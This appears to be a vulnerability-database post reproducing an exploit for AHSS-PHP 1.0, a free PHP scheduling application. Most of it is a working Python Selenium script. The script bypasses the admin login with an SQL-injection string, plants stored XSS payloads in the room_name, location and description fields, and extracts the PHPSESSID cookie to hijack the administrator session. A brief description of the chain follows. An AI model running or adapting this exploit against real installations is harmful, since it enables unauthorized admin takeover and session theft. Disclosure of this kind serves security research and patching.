Monday, October 4, 2021

AHSS-PHP 1.0 Cross Site Scripting / SQL Injection

### Exploit Title: AHSS-PHP (by: oretnom23 ) v1.0 is vulnerable in the application /scheduler/classes/Login.php to remote SQL-Injection-Bypass-Authentication + XSS-Stored Hijacking PHPSESSID
### Author: nu11secur1ty
### Testing and Debugging: nu11secur1ty
### Date: 09.15.2021
### Vendor: https://www.sourcecodester.com/user/257130/activity
### Link:
https://www.sourcecodester.com/php/14902/simple-assembly-hall-scheduling-system-php-free-source-code.html
### CVE: CVE-nu11-11

[+] Exploit Source:

#!/usr/bin/python3
# Author: @nu11secur1ty
# Debug and Developement: @nu11secur1ty
# CVE-nu11-11-09152021

from selenium import webdriver
import time
import os
from colorama import init, Fore, Back, Style
init(convert=True)
import requests


#enter the link to the website you want to automate login.
website_link="http://localhost/scheduler/admin/login.php"

#enter your login username
username="nu11secur1ty' or 1=1#"

#enter your login password
password="nu11secur1ty' or 1=1#"

#enter the element for username input field
element_for_username="username"
#enter the element for password input field
element_for_password="password"

browser = webdriver.Chrome()
browser.get((website_link))

try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)
browser.maximize_window()
time.sleep(1)
browser.execute_script("document.querySelector('[class=\"btn btn-primary
btn-block\"]').click()")

time.sleep(1)
exploit_link="
http://localhost/scheduler/admin/?page=assembly_hall/manage_assembly"
browser.get((exploit_link))

browser.execute_script("document.querySelector('[name=\"room_name\"]').value=\"<script>alert(document.cookie)</script>\"")
browser.execute_script("document.querySelector('[name=\"location\"]').value=\"<script>alert(document.cookie)</script>\"")
browser.execute_script("document.querySelector('[name=\"description\"]').value=\"<script>alert(document.cookie)</script>\"")
time.sleep(1)
browser.execute_script("document.querySelector('[class=\"btn btn-flat
btn-primary\"]').click()")

coockie=browser.execute_script("return document.cookie")
coockie=coockie.split("=")[1]
print(coockie)
browser.close()

time.sleep(3)
os.system("python PWNPHPSESSID.py " + coockie)

print(Fore.GREEN +"The payload for CVE-nu11-11 is deployed...\n")
print(Style.RESET_ALL)

except Exception:
#### This exception occurs if the element are not found in the webpage.
print("Some error occured :(")


------------------------------------------------------------------

### Description:
The AHSS-PHP (by: oretnom23 ) v1.0 is vulnerable in the application
/scheduler/classes/Login.php to remote SQL-Injection-Bypass-Authentication
+ XSS-Stored Hijacking PHPSESSID
- m0re info:
https://portswigger.net/support/using-sql-injection-to-bypass-authentication.

The parameter (username) from the login form is not protected correctly and
there is no security and escaping from malicious payloads.
When the user will sending a malicious query or malicious payload to the
MySQL server he can bypass the login credentials and take control of the
administer account.
2. XSS - Stored PHPSESSID Vulnerable
- The vulnerable XSS app: is "manage_assembly", parameters: "room_name"
"location" and "description"
After the successful SQL injection, the malicious user can be storing an
XSS payload whit who can take the
active PHPSESSID session.
3. remote PHPSESSID - Injection
- After the successful XSS attack the malicious user can take control of
the administrative account of the system from everywhere
by using the PHPSESSID, and then he can make a lot of bad things!

-------------------------------------------------------------------
### CONCLUSION: This vendor must STOP creating all these broken projects
and vulnerable software programs, probably he is not a developer!

### BR
- [+] @nu11secur1ty System Administrator - Infrastructure and Penetration
Testing Engineer

-------------------------------------------------------------------
 

Copyright © 2021 Vulnerability Database | Cyber Details™

thank you Templateism for the design - You should have written the code a little more complicated - Nothing Encrypted anymore